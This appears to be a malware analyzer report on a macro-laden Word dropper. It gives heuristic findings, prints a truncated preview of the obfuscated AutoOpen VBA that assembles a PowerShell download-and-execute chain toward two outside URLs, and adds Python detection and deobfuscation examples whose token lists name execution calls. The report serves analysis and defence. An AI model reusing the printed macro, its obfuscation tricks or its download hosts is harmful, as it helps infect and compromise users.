Verdict: MALICIOUS
Risk Score: 242

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File

Malware Insights
The sample is a malicious Word (OLE) document whose VBA project has an AutoOpen entry point and, per the OLE_VBA_SHELL finding, a Shell() call, so code runs as soon as the document is opened with macros enabled (T1204.002, T1059.005). The extracted macros.bas is heavily obfuscated: the preview is dominated by UCase("..." + "...") assignments that nothing references, while the real content is sliced out of junk string literals with Mid(text, start, length) (VBA Mid is 1-based). The slices that are visible are PowerShell, so the chain also covers T1059.001 even though the analyzer did not tag it. The fragment '-rEplaCe ([cHAr]105+[cHAr]119+[cHAr]57),[cHAr]39' decodes to replacing 'iw9' with a single quote, after which sequences such as 'iw9+iw9' become '+' string-concatenation seams; the 'DownloadFile(' token and the '$ShELliD[1]', 'PshOmE[21]' and 'me[30]+UPBXUPB' pieces are consistent with a WebClient download followed by the usual indexed-character spelling of 'iex' ($ShellId is "Microsoft.PowerShell", and $PSHome[21] and $PSHome[30] are 'i' and 'e'). The URL 'http://ellawhiteUPB+UPBheart.comUPB+UPB/4ngUPB+UPBgUPB+UPBo/,lJPET' reported by the EMBEDDED_URL finding was lifted from the document body before any of this decoding and still carries the 'UPB+UPB' placeholders, and the macro fragments contain a second, differently obfuscated URL ('http:iw9+iw9//tsimtUPB+UPBsum...'), so the extracted string should not be treated as the final download location. Which characters the remaining placeholders ('UPB', '5vY', 'eC7') stand for is not visible in the truncated preview; resolving them needs the rest of macros.bas or a sandbox run. The ClamAV name Img.Dropper.PhishingLure-6443153-0 is consistent with a dropper. One caveat on the findings: the canned text of OLE_LEGACY_WORDBASIC_AUTOEXEC says no modern VBA project was recovered, which is contradicted here by the 75,594-byte macros.bas that olevba extracted, so that hit is redundant with the AutoOpen finding rather than extra evidence.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (In this sample a VBA project was recovered; see the extracted macros.bas below.)
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ellawhiteUPB+UPBheart.comUPB+UPB/4ngUPB+UPBgUPB+UPBo/,lJPET (in document text, OLE body; still contains the macro's 'UPB+UPB' concatenation placeholders, so this is an obfuscated fragment, not a resolved URL)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; the DrawingML XML namespace, expected in any Office document and not an indicator)
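The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above describes a co-occurrence rule. The following is an added example written for this page, not the analyzer's rule implementation: it scans a raw VBA/cache stream blob for an auto-execution identifier alongside a shell/download/object-creation identifier, in both ASCII and UTF-16LE spellings. The token lists, the encoding sweep and the severity mapping are this example's assumptions, and the stream bytes are constructed, not carved from this sample.

```python
"""Auto-exec plus execution-token co-occurrence over a raw VBA stream.

Added example, not the analyzer's rule code. It implements the idea behind
the OLE_VBA_PCODE_AUTOEXEC_EXEC finding: when olevba cannot recover source,
the compiled VBA or cache streams still carry identifier strings, so an
auto-execution name next to a shell/download/object-creation name is a
usable signal. The token lists and the ASCII-or-UTF-16LE sweep are this
example's assumptions about what such streams contain.
"""

# Assumed token lists (not the analyzer's).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Workbook_Open", "Auto_Open")
EXEC_TOKENS = ("Shell", "CreateObject", "DownloadFile", "WScript.Shell",
               "powershell", "ShellExecute")


def _encodings(token: str) -> tuple:
    """Identifiers may be stored as 8-bit text or as UTF-16LE; check both."""
    lowered = token.lower()
    return lowered.encode("ascii"), lowered.encode("utf-16-le")


def find_tokens(blob: bytes, tokens) -> list:
    """Case-insensitive substring search; bytes.lower() only folds ASCII
    letters, which also lowers the letter byte of every UTF-16LE pair."""
    low = blob.lower()
    return sorted(t for t in tokens if any(enc in low for enc in _encodings(t)))


def assess_stream(blob: bytes) -> dict:
    """Severity mirrors the rule's intent: auto-exec AND execution token is
    the strong signal; either alone is only worth a look."""
    auto = find_tokens(blob, AUTOEXEC_TOKENS)
    execs = find_tokens(blob, EXEC_TOKENS)
    if auto and execs:
        severity = "high"
    elif auto or execs:
        severity = "medium"
    else:
        severity = "none"
    return {"autoexec": auto, "exec": execs, "severity": severity}


# Constructed stream samples for the demo (not carved from the report's sample).
SAMPLE_PCODE = (b"\x00\x01junk" + "AutoOpen".encode("utf-16-le")
                + b"\x00\x00more" + b"CreateObject\x00WScript.Shell\x00")
SAMPLE_BENIGN = b"Attribute VB_Name\x00Document_Open\x00MsgBox\x00"

if __name__ == "__main__":
    for name, blob in (("pcode", SAMPLE_PCODE), ("benign", SAMPLE_BENIGN)):
        print(name, assess_stream(blob))
```

The UTF-16LE sweep is what makes the check useful on carved streams: a plain `grep AutoOpen` over the binary misses identifiers stored with interleaved NUL bytes.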
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75594 bytes | 2139b615bcde0b6bf91903bc85fb03b9ac81cab793f1d0e91a7518eeb6a388db |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FHvIjzsOFq"
Function VmtzoboV()
iMzwiYpdk = UCase("FtcaqmViZXYcz" + "jTOADiA" + "oTfFoIpru" + "aWDojbTYooFauC" + "azzpRRtnqFIu") + UCase("zMpiccCcBvnm" + "fuLIOZdTOIsC" + "ijjNjXhibbz" + "wRAJYDJClm" + "bhrjQRiDwjzwVs")
BTjYU = Mid("vlwAr]124 -rEplaCe ([cHAr]105+[cHAr]119+[cHAr]57),[cHAr]39)|.( $ShELliD[1]+$sh9TzhjjrCsK2", 4, 76)
mHwuTrVI = UCase("KwNYRitWjNif" + "CKGSVFjiboCdWh" + "DCfNXuV" + "VlOtwOrzXSIPYn" + "RVDAiIKvuBtTd") + UCase("UHzjPljGMkUk" + "fKOScQLOrTumm" + "qUrFuNQD" + "IiICKKJT" + "wSikfjQDSUc")
qTKWsjilfm = UCase("MPFzDSLlPIdJq" + "izrshIf" + "oQRsXDrwTfRjq" + "znijPwbbnHswOj" + "GokJUboj") + UCase("uIuRpwsG" + "pBDJAsjQN" + "JAZpKqMqjaW" + "IGXlGBKlp" + "ljYfEwnrZ")
oNwkTSAz = UCase("iZHbZVTomioMJD" + "oWFDXILOOD" + "SbIkfjClZFa" + "uuFQcBuAkvFs" + "MiSkWKt") + UCase("zCrfCCIKYd" + "NpKISsiMT" + "rXVPhSB" + "ADvhIzsNkazm" + "MRmfNCWAsnzZW")
lnimzab = Mid("SOjNRqYt+UE5SfVsnZauYGR0qlB4TbPcb", 9, 2)
UHJVHWZcYi = UCase("OLXLVTj" + "cHLjsXswmPl" + "GbntOpQfmQDo" + "SDwjLQn" + "jJiDErBmH") + UCase("YGrznYiw" + "DEoLDWfZTvN" + "wwPXRFpJzOs" + "HfiJUQYFPkj" + "uwihZRiq")
YaLfYVVXCTp = UCase("fWPVjGa" + "aXjjMPEHIN" + "MfGikTPiiIPz" + "msMrUFPj" + "oqOzjqGvl") + UCase("ksKaYnfBUbr" + "LaYuUDNmC" + "AwqPTlmZXnWkNP" + "RnDpDvEXYfo" + "lWDhwcmrNkJ")
NWQAoEU = UCase("jHEQwquIiFffp" + "tfmavPKTlblV" + "KdriMKTt" + "MCMutZk" + "YQLknTwGzUhNW") + UCase("fdjjimXTVVq" + "TjNAVlisCVJZW" + "vbOqmfii" + "iNKuwUFvpt" + "AMszwwfibJTGMU")
pVLmtHuOloQ = Mid("VYme[30]+UPBXUPB) ( ((UPBeUPB+UPBC7franc = UPB+U9MMtOF7aZzfCT2wcdf4rJcuMRbG3", 3, 46)
fpbQtcY = UCase("uPuDEsbNIS" + "PKwwCwZ" + "kfKADUFYH" + "XOhijvoAASj" + "aSSToXC") + UCase("jvoSZojOrjz" + "TmkEVkaBKC" + "GlfErhjfiWdrca" + "FuLaJQTLk" + "hOwEwAThzihtk")
mUSjn = UCase("wEijKNkLfnLrk" + "wZUfbJjiRr" + "AzHNOGzZHXAQG" + "iPBNJmFuGijz" + "lLHOnntKNcz") + UCase("jORcAvJNw" + "thUHFkGtddPfL" + "AJNdMYUmD" + "dYnRGjaldsRZuj" + "IEUzTAADDbqi")
BbZbkGQaz = UCase("IkuzEsCvfsbF" + "mJUMucwHWCaTjE" + "EawfLJKYSIaJk" + "oswkGLwROF" + "fflhUfVnNrFtvu") + UCase("clCDTSMihJdj" + "ttmLsmfiYqw" + "FVWhiwBpTiL" + "KlbTzDXqv" + "uUEtAJOIEuEaO")
TVium = Mid("t ((' (iw9&( 5vYPshOmE[21]+5vYPshOimFaKqsjUCWMMfHj7TOmu9", 2, 33)
uizsvLnTT = UCase("BXYGiWdhzon" + "DdBSwbOjvEUznj" + "dUjqPAukGUKvXC" + "KQhFQXw" + "HAbCkzDYTuZA") + UCase("OzXtIsvw" + "jqdutEShTZij" + "pnwJnDvqAwC" + "wSJMHfCmUTkYq" + "wFmazWc")
ajzhQCuvz = UCase("pAzLctILiXAHKM" + "USHhMbCcowrb" + "dQKkXidw" + "MOBjjlh" + "twBakbwsBVnXK") + UCase("kRzhRMPj" + "jlPFtjdsQvv" + "salspOs" + "IqYtAdjmBU" + "dJSSpVVDLY")
BtFGdApCjCY = UCase("nzzsFQZAz" + "TKiLvHjVVzUb" + "EPANHAiWwuQf" + "MDcSoiDS" + "wTzOIdAbotMOsd") + UCase("CSzRJVP" + "jmvdsCIpX" + "LQhQtsFWX" + "WSvTZYQ" + "fmIYiBRcNz")
ELfnLk = Mid("wlrp2YiwRrwZPB'+'+UPB,http:iw9+iw9//tsimtUPB+UPBsumUPB+UPiw9+iw9B.eUPB+UPBu/3GrPU0zDslQhwzztDvh0TFI", 13, 69)
UMjVjHb = UCase("WcPIsrMocwX" + "XtMVFPwrq" + "aRuZIvXTKjzfTw" + "slsaNrWFvvY" + "zPnOjnaBzNS") + UCase("QQJnrQrZPrNi" + "RdEELzi" + "SXDXRQstvjiS" + "JwiiOiDw" + "ICJKPJWwm")
FQrjkCOpFMj = UCase("YfEpwhNX" + "ZHLnwJvNqcDU" + "nKkKmifzQfFO" + "aSdzlMAiwXbUZY" + "Dlkvnmst") + UCase("lvismIb" + "Zzjcjrr" + "UIqmJpMJYvfuK" + "MhYZNqhHrnv" + "vapiTttESd")
tTDWLoQzZ = UCase("FvTGvTZiojnkJw" + "lMdZucpSOjpV" + "NVYcNdKQ" + "GqzHGTwiCTDSM" + "UjsQPdFZF") + UCase("RQSKLXjoQtGmZm" + "WTjdWSqBCD" + "UMunmhkBqqAnTf" + "PBSNhHFutJVwj" + "aOPHPCTtdGZ")
ZQiZw = Mid("t84RbQY4oHPm+UPBn eC7bcd)UPB+UPB{tryUPB+UPiw9+iw9B{eC7frUPB+UPBaUPB+UPBncUPB+UPB.DoUPB'+'+UPBwnlUPB+UPBoadFiUPB+UPBlUPB+U'+'PBe(eCUPBiwbp4zOTcZBWdUDimT4HLV", 13, 123)
wfrHwGIz = UCase("HvwiVUq" + "hvwnBEKiBJM" + "DqnumUucm" + "FIijRiR" + "MnBKOazm") + UCase("aJOsuGNwQHBvA" + "OqhpqEVmjNt" + "ZPscNwAjUSXHLC" + "hBWPLLMmTh" + "HhSndBzzjzFn")
osNsMqXQLUm = U
... (truncated)
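The preview above shows the three obfuscation layers the summary refers to: Mid() slicing of junk literals, [cHAr]-built -replace arguments, and '+' concatenation seams. The following Python is an added example written for this page (not the analyzer's code and not the macro's own decoder); it copies three Mid() lines from the preview as its input and walks them through each layer. The 'iw9' to single-quote rule is read from the fragment itself; treating 'UPB' as a second quote placeholder is an assumption, flagged in the code, because its replacement is not in the truncated preview.

```python
"""Reproduce the string-slicing obfuscation visible in the macros.bas preview.

Added example written for this report; it is not the analyzer's code. The
three Mid() lines below are copied from the preview. Three layers are visible
there and each gets a helper:
  1. VBA Mid(text, start, length) slices the real fragment out of a junk
     literal; Mid is 1-based, so an off-by-one corrupts every fragment.
  2. PowerShell builds the arguments of -replace from [cHAr]N sums so the
     pattern never appears literally; decoding them yields  iw9 -> '
  3. Once iw9 is a quote, runs like  iw9+iw9  become  '+'  seams that
     PowerShell joins at runtime; collapsing the seams restores the text.
ASSUMPTION: "UPB" is treated as a second quote placeholder. Its replacement
is not in the truncated preview, so that step is labelled 'assumed' below.
"""
import re

MID_CALL = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')
CHAR_EXPR = re.compile(r"\[cHAr\](\d+)", re.IGNORECASE)
REPLACE_CALL = re.compile(r"-rEplaCe\s*\(([^)]*)\)\s*,\s*(\[cHAr\]\d+)", re.IGNORECASE)
SEAM = "'+'"  # concatenation of two single-quoted PowerShell literals

# Constructed input: three Mid() lines copied verbatim from the preview.
PREVIEW = r"""
BTjYU = Mid("vlwAr]124 -rEplaCe ([cHAr]105+[cHAr]119+[cHAr]57),[cHAr]39)|.( $ShELliD[1]+$sh9TzhjjrCsK2", 4, 76)
lnimzab = Mid("SOjNRqYt+UE5SfVsnZauYGR0qlB4TbPcb", 9, 2)
ELfnLk = Mid("wlrp2YiwRrwZPB'+'+UPB,http:iw9+iw9//tsimtUPB+UPBsumUPB+UPiw9+iw9B.eUPB+UPBu/3GrPU0zDslQhwzztDvh0TFI", 13, 69)
"""


def vba_mid(text: str, start: int, length: int) -> str:
    """VBA Mid(): start is 1-based and length counts characters."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid() uses a 1-based start and a non-negative length")
    return text[start - 1:start - 1 + length]


def extract_fragments(vba_source: str) -> list:
    """Mid()-sliced fragments in source order. The UCase(...) assignments are
    never referenced in the preview and are ignored as padding."""
    return [vba_mid(s, int(a), int(b)) for s, a, b in MID_CALL.findall(vba_source)]


def decode_char_expr(expr: str) -> str:
    """'[cHAr]105+[cHAr]119+[cHAr]57' -> 'iw9' (PowerShell joins chars as text)."""
    return "".join(chr(int(n)) for n in CHAR_EXPR.findall(expr))


def find_replace_rules(powershell: str) -> dict:
    """Recover pattern -> replacement pairs from '-rEplaCe ([cHAr]..),[cHAr]N'."""
    return {decode_char_expr(p): decode_char_expr(r)
            for p, r in REPLACE_CALL.findall(powershell)}


def apply_rules(text: str, rules: dict) -> str:
    for pattern, replacement in rules.items():
        text = text.replace(pattern, replacement)
    return text


def join_seams(text: str) -> str:
    """Drop the '+' seams PowerShell would concatenate at runtime."""
    return text.replace(SEAM, "")


def collapse_placeholder(text: str, placeholder: str) -> str:
    """Treat `placeholder` as a stand-in for a single quote, then join seams."""
    return join_seams(text.replace(placeholder, "'"))


def deobfuscate_preview(vba_source: str = PREVIEW) -> dict:
    frags = extract_fragments(vba_source)
    rules = {}
    for fragment in frags:
        rules.update(find_replace_rules(fragment))      # layer 2: iw9 -> '
    certain = [join_seams(apply_rules(f, rules)) for f in frags]  # layer 3
    # ASSUMED step: UPB as a second quote placeholder (not shown in preview).
    assumed = [collapse_placeholder(f, "UPB") for f in certain]
    return {"fragments": frags, "rules": rules, "certain": certain, "assumed": assumed}


if __name__ == "__main__":
    result = deobfuscate_preview()
    print("rules:", result["rules"])
    for stage in ("fragments", "certain", "assumed"):
        print(stage)
        for item in result[stage]:
            print("   ", item)
```

Run it as a script to print the fragments after each layer. Two things it deliberately does not do: it keeps the fragments in source order, because the concatenation order is in the part of macros.bas the preview cuts off, and it resolves no placeholder other than 'iw9' (and, as a labelled assumption, 'UPB'); the remaining '5vY' and 'eC7' tokens need the full script or a sandbox run.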